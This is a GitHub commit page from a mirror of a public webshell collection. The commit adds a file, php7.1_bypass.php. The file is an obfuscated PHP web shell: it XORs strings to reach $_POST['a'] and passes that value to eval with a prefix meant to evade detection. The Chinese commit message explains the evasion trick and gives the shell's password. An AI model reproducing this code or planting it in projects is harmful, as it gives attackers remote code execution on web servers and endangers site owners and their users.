1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

Create php7.1_bypass.php

from : https://www.anquanke.com/post/id/193787
参数$b的前面加上“n"就成功绕过了,当然同理,你也可以在参数$b的前面加上"\"、"\t"、"\r"等等也是可以绕过的。
在参数$b的前面加上"\n",""、"\t"、"\r"等等也是可以绕过的。

木马密码:a
This commit is contained in:
tennc
2019-12-06 18:33:51 +08:00
committed by GitHub
parent dd69ea2853
commit c290a06bc9

5
php/php7.1_bypass.php Normal file
View File

@@ -0,0 +1,5 @@
<?php
$a = "~+d()"^"!{+{}";
$b = ${$a}[a];
eval("n".$b);
?>